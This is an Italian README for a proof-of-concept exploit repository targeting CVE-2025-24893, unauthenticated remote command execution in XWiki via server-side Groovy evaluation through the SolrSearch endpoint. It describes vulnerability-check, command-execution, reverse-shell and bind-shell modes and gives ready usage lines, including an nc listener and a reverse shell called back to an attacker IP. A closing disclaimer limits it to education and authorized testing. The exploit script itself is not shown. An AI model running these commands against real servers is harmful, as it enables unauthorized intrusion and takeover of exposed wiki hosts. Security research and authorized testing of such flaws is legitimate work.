Prova di concetto per CVE-2025-24893 che dimostra l'esecuzione remota non autenticata di comandi in XWiki attraverso una valutazione non sicura di template lato server.
Questo repository contiene un Proof of Concept (PoC) controllato per CVE-2025-24893, una vulnerabilità di Esecuzione Comandi Remota (RCE) non autenticata che colpisce XWiki.
La vulnerabilità consente a un attacker di eseguire comandi arbitrari del sistema operativo sul server a causa di una valutazione non sicura di template e script lato server.
XWiki è una piattaforma wiki enterprise open-source comunemente utilizzata per:
Poiché XWiki è spesso distribuito su server esposti a Internet, le vulnerabilità nella gestione delle richieste e nella logica di scripting possono avere un alto impatto nel mondo reale.
L'input controllato dall'utente passato all'endpoint SolrSearch non è stato validato e valutato correttamente dal motore di scripting Groovy. Ciò ha permesso che l'input fornito dall'attaccante fosse interpretato come codice eseguibile lato server, con conseguente esecuzione di comandi sul sistema host.
Questo PoC dimostra quanto segue:
Modalità di Rilevamento Vulnerabilità Conferma in sicurezza se l'istanza target è vulnerabile eseguendo un'espressione lato server benigna.
Esecuzione Comandi Remota Dimostra l'esecuzione arbitraria di comandi sul sistema target.
Esecuzione Reverse Shell Stabilisce una connessione shell in uscita dal target al tester.
Bind Shell (Opzionale) Apre una shell in ascolto sull'host target (meno affidabile delle reverse shell).
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
SolrSearchQuesto progetto è fornito strettamente per scopi educativi e test di sicurezza autorizzati. Qualsiasi uso non autorizzato di questo codice contro sistemi senza esplicita autorizzazione è vietato.
Questo repository è stato creato per dimostrare: